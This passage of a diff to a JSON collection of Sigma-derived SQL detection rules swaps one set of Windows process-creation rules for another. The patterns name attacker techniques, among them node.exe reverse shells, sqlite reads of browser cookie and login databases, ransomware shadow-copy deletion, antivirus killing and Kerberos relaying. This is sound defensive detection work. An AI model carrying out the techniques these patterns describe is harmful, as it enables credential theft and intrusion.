"filename": "proc_creation_win_susp_script_exec_from_temp.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential Arbitrary Code Execution Via Node.EXE", + "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", + "status": "experimental", + "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562" + "attack.t1127" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_node_abuse.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "SQLite Chromium Profile Data DB Access", + "id": "24c77512-782b-448a-8950-eddb0785fc71", + "status": "experimental", + "description": "Detect usage of the \"sqlite\" binary to query databases in Chromium-based browsers for potential data stealing.", + "author": "TropChaud", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1539", + "attack.t1555.003", + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%\\\\User Data\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Opera Software\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ChromiumViewer\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%Login Data%' ESCAPE '\\' OR CommandLine LIKE '%Cookies%' ESCAPE '\\' OR CommandLine LIKE '%Web Data%' ESCAPE '\\' OR CommandLine LIKE '%History%' ESCAPE '\\' OR CommandLine LIKE '%Bookmarks%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_sqlite_chromium_profile_data.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Whoami.EXE Execution From Privileged Process", + "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", + "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "tags": [ + "attack.privilege_escalation", "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.t1033" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'whoami.exe' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious PrinterPorts Creation (CVE-2020-1048)", + "id": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "status": "test", + "description": "Detects new commands that add new printer port which point to suspicious file", + "author": "EagleEye Team, Florian Roth", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.persistence", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Add-PrinterPort -Name%' ESCAPE '\\' AND (CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\')) OR CommandLine LIKE '%Generic / Text Only%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": "proc_creation_win_exploit_cve_2020_1048.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", - "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", + "title": "Potential Maze Ransomware Activity", + "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "status": "test", + "description": "Detects specific process characteristics of Maze ransomware word document droppers", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" - ], - "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" - ], - "filename": "proc_creation_win_pua_chisel.yml" - }, - { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", - "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((((((((((NewProcessName LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" - ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" - }, - { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", - "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", - "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.execution", - "attack.t1574.002" + "attack.t1204.002", + "attack.t1047", + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_malware_maze_ransomware.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", - "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "LockerGoga Ransomware Activity", + "id": "74db3488-fd28-480a-95aa-b7af626de068", + "status": "stable", + "description": "Detects LockerGoga ransomware activity via specific command line.", + "author": "Vasiliy Burov, oscd.community", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", - "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "Kavremover Dropped Binary LOLBIN Usage", + "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" - }, - { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", - "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" - ], - "falsepositives": [ - "Legitimate software creating script event consumers" + "attack.defense_evasion", + "attack.t1127" ], - "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_lolbin_kavremover.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Taskkill Symantec Endpoint Protection", + "id": "4a6713f6-3331-11ed-a261-0242ac120002", + "status": "experimental", + "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.\n", + "author": "Ilya Krestinichev, Florian Roth (Nextron Systems)", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], @@ -10299,73 +9981,28 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%taskkill%' ESCAPE '\\' AND CommandLine LIKE '% /F %' ESCAPE '\\' AND CommandLine LIKE '% /IM %' ESCAPE '\\' AND CommandLine LIKE '%ccSvcHst.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ke3chang_tidepool.yml" + "filename": "proc_creation_win_taskkill_sep.yml" }, { - "title": "Potential NTLM Coercion Via Certutil.EXE", - "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", + "title": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE", + "id": "68bcd73b-37ef-49cb-95fc-edc809730be6", "status": "experimental", - "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", + "description": "Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '% -syncwithWU %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_certutil_ntlm_coercion.yml" - }, - { - "title": "HackTool - DInjector PowerShell Cradle Execution", - "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", - "status": "test", - "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_hktl_dinjector.yml" - }, - { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service get %' ESCAPE '\\' AND CommandLine LIKE '%name,displayname,pathname,startmode%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml" }, { "title": "Potential SMB Relay Attack Tool Execution", @@ -10386,26 +10023,6 @@ ], "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" }, - { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" - ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" - }, { "title": "HackTool - winPEAS Execution", "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", @@ -10428,43 +10045,63 @@ "filename": "proc_creation_win_hktl_winpeas.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "title": "Exploiting CVE-2019-1388", + "id": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "status": "stable", + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '% http%' ESCAPE '\\') AND (IntegrityLevel = 'System' OR (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml" + }, + { + "title": "HackTool - KrbRelay Execution", + "id": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of KrbRelay, a Kerberos relaying tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelay.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelay.exe') OR (CommandLine LIKE '% -spn %' ESCAPE '\\' AND CommandLine LIKE '% -clsid %' ESCAPE '\\' AND CommandLine LIKE '% -rbcd %' ESCAPE '\\') OR (CommandLine LIKE '%shadowcred%' ESCAPE '\\' AND CommandLine LIKE '%clsid%' ESCAPE '\\' AND CommandLine LIKE '%spn%' ESCAPE '\\') OR (CommandLine LIKE '%spn %' ESCAPE '\\' AND CommandLine LIKE '%session %' ESCAPE '\\' AND CommandLine LIKE '%clsid %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_krbrelay.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "title": "Suspicious Binary In User Directory Spawned From Office Application", + "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", + "author": "Jason Lynch", "tags": [ "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" }, { "title": "Fireball Archer Install", @@ -10487,241 +10124,222 @@ "filename": "proc_creation_win_malware_fireball.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", - "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "title": "Abused Debug Privilege by Arbitrary Parent Processes", + "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "status": "test", + "description": "Detection of unusual child 